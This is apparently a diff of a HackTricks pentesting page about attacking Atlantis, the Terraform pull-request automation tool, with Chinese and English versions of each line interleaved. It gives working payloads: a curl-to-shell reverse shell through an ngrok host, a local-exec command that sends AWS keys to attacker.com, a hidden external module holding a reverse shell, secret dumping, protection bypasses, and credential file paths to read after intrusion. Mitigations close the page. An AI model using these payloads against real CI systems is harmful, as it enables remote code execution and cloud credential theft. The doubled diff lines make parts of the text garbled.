\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
- **User**
\[可以在 DAGs 上读取,可以在 DAGs 上编辑,可以在 DAGs 上删除,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Task Instances 上编辑,可以在 DAG Runs 上删除,可以在 DAG Runs 上创建,可以在 DAG Runs 上编辑,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Plugins 上读取,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse菜单访问 DAG Dependencies菜单访问 DAG Runs菜单访问 Documentation菜单访问 Docs菜单访问 Jobs菜单访问 Audit Logs菜单访问 Plugins菜单访问 SLA Misses菜单访问 Task Instances可以在 Task Instances 上创建,可以在 Task Instances 上删除]
\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
- **Viewer**
\[可以在 DAGs 上读取,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Plugins 上读取,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse菜单访问 DAG Dependencies菜单访问 DAG Runs菜单访问 Documentation菜单访问 Docs菜单访问 Jobs菜单访问 Audit Logs菜单访问 Plugins菜单访问 SLA Misses菜单访问 Task Instances]
\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
- **Public**
\[]
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,111 +2,111 @@
{{#include ../banners/hacktricks-training.md}}
### 基本信息
### Basic Information
Atlantis 基本上帮助您从 git 服务器的 Pull Requests 运行 terraform。
Atlantis basically helps you to to run terraform from Pull Requests from your git server.
![](<../images/image (161).png>)
### 本地实验室
### Local Lab
1. 前往 **atlantis releases page** [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) **下载** 适合您的版本。
2. 创建一个 **个人令牌**(具有 repo 访问权限)您的 **github** 用户。
3. 执行 `./atlantis testdrive`,它将创建一个您可以用来 **与 atlantis 交互的 demo repo**
1. 您可以在 127.0.0.1:4141 访问网页。
1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
2. Create a **personal token** (with repo access) of your **github** user
3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
1. You can access the web page in 127.0.0.1:4141
### Atlantis 访问
### Atlantis Access
#### Git 服务器凭据
#### Git Server Credentials
**Atlantis** 支持多个 git 主机,如 **Github****Gitlab**、**Bitbucket** 和 **Azure DevOps**\
然而,为了访问这些平台上的 repos 并执行操作,它需要获得一些 **特权访问权限**(至少是写权限)。\
[**文档**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) 鼓励在这些平台上为 Atlantis 创建一个用户,但有些人可能会使用个人账户。
**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts.
> [!WARNING]
> 在任何情况下,从攻击者的角度来看,**Atlantis 账户**将是一个非常 **有趣的** **目标**
> In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
#### Webhooks
Atlantis 可选地使用 [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) 来验证它从您的 Git 主机接收的 **webhooks** 是否 **合法**
Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
确认这一点的一种方法是 **仅允许来自 Git 主机的 IP 的请求**,但更简单的方法是使用 Webhook Secret
One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
请注意,除非您使用私有的 github bitbucket 服务器,否则您需要将 webhook 端点暴露到互联网。
Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet.
> [!WARNING]
> Atlantis 将 **暴露 webhooks**,以便 git 服务器可以向其发送信息。从攻击者的角度来看,了解 **您是否可以向其发送消息** 将是有趣的。
> Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
#### 提供者凭据 <a href="#provider-credentials" id="provider-credentials"></a>
#### Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a>
[来自文档:](https://www.runatlantis.io/docs/provider-credentials.html)
[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html)
Atlantis 通过简单地 **在托管 Atlantis 的服务器上执行 `terraform plan` `apply`** 命令来运行 Terraform。就像在本地运行 Terraform 一样Atlantis 需要您特定提供者的凭据。
Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
您可以选择如何 [提供凭据](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) Atlantis
It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
- Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) 有自己的提供者凭据机制。请阅读它们的文档。
- 如果您在云中运行 Atlantis那么许多云都有方法为在其上运行的应用程序提供云 API 访问权限,例如:
- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs)(搜索 "EC2 Role"
- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
- 许多用户设置环境变量,例如 `AWS_ACCESS_KEY`,在 Atlantis 运行的地方。
- 其他人创建必要的配置文件,例如 `~/.aws/credentials`,在 Atlantis 运行的地方。
- 使用 [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) 获取提供者凭据。
- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
- Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
> [!WARNING]
> **运行** **Atlantis** **容器** 很可能 **包含特权凭据**,用于 Atlantis 通过 Terraform 管理的提供者(AWSGCPGithub...)。
> The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
#### 网页
#### Web Page
默认情况下Atlantis 将在本地主机的 **4141 端口运行一个网页**。此页面仅允许您启用/禁用 atlantis apply并检查 repos 的计划状态并解锁它们(不允许修改内容,因此不是很有用)。
By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful).
您可能不会发现它暴露在互联网上,但默认情况下 **不需要凭据** 来访问它(如果需要,`atlantis`:`atlantis`**默认** 凭据)。
You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones).
### 服务器配置
### Server Configuration
`atlantis server` 的配置可以通过命令行标志、环境变量、配置文件或三者的混合来指定。
Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
- 您可以在 [**这里找到标志列表**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) Atlantis 服务器支持。
- 您可以在 [**这里找到如何将配置选项转换为环境变量**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
值的 **选择顺序** 为:
Values are **chosen in this order**:
1. 标志
2. 环境变量
3. 配置文件
1. Flags
2. Environment Variables
3. Config File
> [!WARNING]
> 请注意,在配置中,您可能会发现一些有趣的值,例如 **令牌和密码**
> Note that in the configuration you might find interesting values such as **tokens and passwords**.
#### Repos 配置
#### Repos Configuration
某些配置会影响 **如何管理 repos**。然而,可能 **每个 repo 需要不同的设置**,因此有方法可以指定每个 repo。这是优先顺序
Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) 文件。此文件可用于指定 atlantis 应如何处理该 repo。然而默认情况下某些键在没有某些标志允许的情况下无法在此处指定。
1. 可能需要通过标志如 `allowed_overrides` `allow_custom_workflows` 进行允许。
2. [**服务器端配置**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config):您可以通过标志 `--repo-config` 传递它,这是一个 yaml 配置每个 repo 的新设置(支持正则表达式)。
3. **默认** 值。
1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
3. **Default** values
**PR 保护**
**PR Protections**
Atlantis 允许指示您是否希望 **PR** 被其他人 **`批准`**(即使在分支保护中未设置)和/或在运行 apply 之前 **`可合并`**(分支保护通过)。从安全的角度来看,设置这两个选项是推荐的。
Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
如果 `allowed_overrides` True,这些设置可以在每个项目的 `/atlantis.yml` 文件中 **被覆盖**
In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
**脚本**
**Scripts**
repo 配置可以 **指定脚本** 在 [**之前**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage)_预工作流钩子_和 [**之后**](https://www.runatlantis.io/docs/post-workflow-hooks.html)_后工作流钩子_执行 **工作流**
The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.**
没有任何选项允许在 **repo `/atlantis.yml`** 文件中 **指定** 这些脚本。
There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file. However, if there is a confgured script to execute that is located in the same repo, it's possible to **modify it's content in a PR and make it execute arbitrary code.**
**工作流**
**Workflow**
在 repo 配置(服务器端配置)中,您可以 [**指定新的默认工作流**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow),或 [**创建新的自定义工作流**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**** 您还可以 **指定** 哪些 **repos** 可以 **访问** 生成的新工作流。\
然后,您可以允许每个 repo 的 **atlantis.yaml** 文件 **指定要使用的工作流**
In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
> [!CAUTION]
> 如果 [**服务器端配置**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) 标志 `allow_custom_workflows` 设置为 **True**,则可以在每个 repo 的 **`atlantis.yaml`** 文件中 **指定** 工作流。也可能需要 **`allowed_overrides`** 也指定 **`workflow`** **覆盖将要使用的工作流**。\
> 这将基本上给 **任何可以访问该 repo 的用户在 Atlantis 服务器中提供 RCE**
> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\
> This will basically give **RCE in the Atlantis server to any user that can access that repo**.
>
> ```yaml
> # atlantis.yaml
@@ -124,20 +124,21 @@ repo 配置可以 **指定脚本** 在 [**之前**](https://www.runatlantis.io/d
> steps: - run: my custom apply command
> ```
**Conftest 策略检查**
**Conftest Policy Checking**
Atlantis 支持在计划输出上运行 **服务器端** [**conftest**](https://www.conftest.dev/) **策略**。使用此步骤的常见用例包括:
Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include:
- 拒绝使用模块列表
- 在创建时断言资源的属性
- 捕获无意的资源删除
- 防止安全风险(即将安全端口暴露给公众)
- Denying usage of a list of modules
- Asserting attributes of a resource at creation time
- Catching unintentional resource deletions
- Preventing security risks (ie. exposing secure ports to the public)
您可以在 [**文档中**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works) 查看如何配置它。
You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
### Atlantis 命令
### Atlantis Commands
[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
[**在文档中**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) 您可以找到运行 Atlantis 的选项:
```bash
# Get help
atlantis help
@@ -160,82 +161,94 @@ atlantis apply [options] -- [terraform apply flags]
## --verbose
## You can also add extra terraform options
```
### 攻击
### Attacks
> [!WARNING]
> 如果在利用过程中发现此 **错误**: `Error: Error acquiring the state lock`
> If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
You can fix it by running:
您可以通过运行以下命令来修复它:
```
atlantis unlock #You might need to run this in a different PR
atlantis plan -- -lock=false
```
#### Atlantis plan RCE - 在新 PR 中修改配置
如果您对一个仓库具有写入权限,您将能够在其上创建一个新分支并生成一个 PR。如果您可以 **执行 `atlantis plan`**(或者可能是自动执行的) **您将能够在 Atlantis 服务器内部进行 RCE**
#### Atlantis plan RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Just put a payload like the following in the `main.tf` file:
您可以通过让 [**Atlantis 加载外部数据源**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) 来做到这一点。只需在 `main.tf` 文件中放入如下有效负载:
```json
data "external" "example" {
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
**更隐蔽的攻击**
您可以通过遵循以下建议以**更隐蔽的方式**执行此攻击:
**Stealthier Attack**
You can perform this attack even in a **stealthier way**, by following this suggestions:
- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
- 不要直接将反向 shell 添加到 terraform 文件中,您可以**加载一个包含反向 shell 的外部资源**
```javascript
module "not_rev_shell" {
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
您可以在 [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) 找到 rev shell 代码。
- 在外部资源中,使用 **ref** 功能来隐藏 **repo 中一个分支的 terraform rev shell 代码**,类似于:`git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
- **而不是** 创建一个 **PR 到 master** 来触发 Atlantis**创建 2 个分支**test1 和 test2并从一个分支创建一个 **PR 到另一个分支**。当您完成攻击后,只需 **删除 PR 和分支**
You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
#### Atlantis 计划秘密转储
- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
#### Atlantis plan Secrets Dump
You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file:
您可以通过在 terraform 文件中放置类似的内容来 **转储 terraform 使用的秘密**,运行 `atlantis plan` (`terraform plan`)
```json
output "dotoken" {
value = nonsensitive(var.do_token)
value = nonsensitive(var.do_token)
}
```
#### Atlantis apply RCE - 在新PR中修改配置
如果您对一个仓库具有写入权限您将能够在其上创建一个新分支并生成一个PR。如果您可以**执行 `atlantis apply`您将能够在Atlantis服务器内部进行RCE**。
#### Atlantis apply RCE - Config modification in new PR
然而,您通常需要绕过一些保护措施:
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
- **可合并**如果在Atlantis中设置了此保护您只能在**PR可合并时运行 `atlantis apply`**(这意味着需要绕过分支保护)。
- 检查潜在的[**分支保护绕过**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
- **已批准**如果在Atlantis中设置了此保护某个**其他用户必须批准PR**,您才能运行 `atlantis apply`
- 默认情况下,您可以滥用[**Gitbot令牌来绕过此保护**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
However, you will usually need to bypass some protections:
- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed).
- Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply`
- By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
You just need to make sure some payload like the following ones ends in the `main.tf` file:
在恶意Terraform文件上运行**`terraform apply`,使用**[**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
您只需确保一些有效载荷像以下内容结束于 `main.tf` 文件中:
```json
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
}
```
遵循**前一种技术的建议**以**更隐蔽的方式**执行此攻击。
#### Terraform 参数注入
Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**.
#### Terraform Param Injection
When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
当运行 `atlantis plan``atlantis apply`terraform 在后台运行,您可以通过在 atlantis 中评论类似的内容来传递命令给 terraform
```bash
atlantis plan -- <terraform commands>
atlantis plan -- -h #Get terraform plan help
@@ -243,17 +256,18 @@ atlantis plan -- -h #Get terraform plan help
atlantis apply -- <terraform commands>
atlantis apply -- -h #Get terraform apply help
```
可以传递的内容是环境变量,这可能有助于绕过某些保护。查看 terraform 环境变量在 [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
#### 自定义工作流
Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
运行在 `atlantis.yaml` 文件中指定的 **恶意自定义构建命令**。Atlantis 使用来自拉取请求分支的 `atlantis.yaml` 文件,而不是 `master`。\
这一可能性在前面的部分中提到过:
#### Custom Workflow
Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\
This possibility was mentioned in a previous section:
> [!CAUTION]
> 如果 [**服务器端配置**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) 标志 `allow_custom_workflows` 设置为 **True**,则可以在每个仓库的 **`atlantis.yaml`** 文件中 **指定** 工作流。还可能需要 **`allowed_overrides`** 也指定 **`workflow`** **覆盖将要使用的工作流**。
> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.
>
> 这基本上会给 **任何可以访问该仓库的用户在 Atlantis 服务器上提供 RCE**
> This will basically give **RCE in the Atlantis server to any user that can access that repo**.
>
> ```yaml
> # atlantis.yaml
@@ -272,101 +286,106 @@ atlantis apply -- -h #Get terraform apply help
> - run: my custom apply command
> ```
#### 绕过计划/应用保护
#### Bypass plan/apply protections
If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _has_ `apply_requirements` configured, it's possible for a repo to **modify the plan/apply protections to bypass them**.
如果 [**服务器端配置**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) 标志 `allowed_overrides` __ 配置 `apply_requirements`,则仓库可以 **修改计划/应用保护以绕过它们**
```yaml
repos:
- id: /.*/
apply_requirements: []
- id: /.*/
apply_requirements: []
```
#### PR 劫持
如果有人在您的有效拉取请求上发送 **`atlantis plan/apply`** 评论,这将导致 terraform 在您不希望它运行时执行。
#### PR Hijacking
此外,如果您没有在 **分支保护** 中配置在 **新提交推送** 到它时要求 **重新评估** 每个 PR那么有人可能会在 terraform 配置中 **编写恶意配置**(查看之前的场景),运行 `atlantis plan/apply` 并获得 RCE。
If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
这是 Github 分支保护中的 **设置**
Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE.
This is the **setting** in Github branch protections:
![](<../images/image (216).png>)
#### Webhook 密钥
#### Webhook Secret
如果您设法 **窃取了 webhook 密钥** 或者 **没有使用任何 webhook 密钥**,您可以 **调用 Atlantis webhook** **直接调用 atlantis 命令**
If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly.
#### Bitbucket
Bitbucket Cloud **不支持 webhook 密钥**。这可能允许攻击者 **伪造来自 Bitbucket 的请求**。确保您只允许 Bitbucket IP
Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
- 这意味着 **攻击者** 可以向 **Atlantis** 发出看似来自 Bitbucket 的 **虚假请求**
- 如果您指定了 `--repo-allowlist`,那么他们只能伪造与那些仓库相关的请求,因此他们能造成的最大损害就是在您自己的仓库上进行计划/应用。
- 为了防止这种情况,允许列入白名单 [Bitbucket IP 地址](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html)(请参见出站 IPv4 地址)。
- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
### 后期利用
### Post-Exploitation
如果您设法访问了服务器,或者至少获得了 LFI有一些有趣的内容您应该尝试读取
If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read:
- `/home/atlantis/.git-credentials` 包含 vcs 访问凭据
- `/atlantis-data/atlantis.db` 包含更多信息的 vcs 访问凭据
- `/atlantis-data/repos/<org_name>`_`/`_`<repo_name>/<pr_num>/<workspace>/<path_to_dir>/.terraform/terraform.tfstate` Terraform 状态文件
- 示例:/atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
- `/proc/1/environ` 环境变量
- `/proc/[2-20]/cmdline` `atlantis server` 的命令行(可能包含敏感数据)
- `/home/atlantis/.git-credentials` Contains vcs access credentials
- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info
- `/atlantis-data/repos/<org_name>`_`/`_`<repo_name>/<pr_num>/<workspace>/<path_to_dir>/.terraform/terraform.tfstate` Terraform stated file
- Example: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
- `/proc/1/environ` Env variables
- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
### 缓解措施
### Mitigations
#### 不要在公共仓库上使用 <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>
#### Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>
因为任何人都可以在公共拉取请求上评论,即使有所有可用的安全缓解措施,在没有适当配置安全设置的情况下,在公共仓库上运行 Atlantis 仍然是危险的。
Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
#### 不要使用 `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>
#### Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>
如果您在公共仓库上运行(不推荐,见上文),您不应该设置 `--allow-fork-prs`(默认为 false因为任何人都可以从他们的分叉向您的仓库打开拉取请求。
If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
#### `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a>
Atlantis 要求您通过 `--repo-allowlist` 标志指定一个允许列表,接受来自的 webhook。例如
Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
- 特定仓库:`--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
- 您的整个组织:`--repo-allowlist=github.com/runatlantis/*`
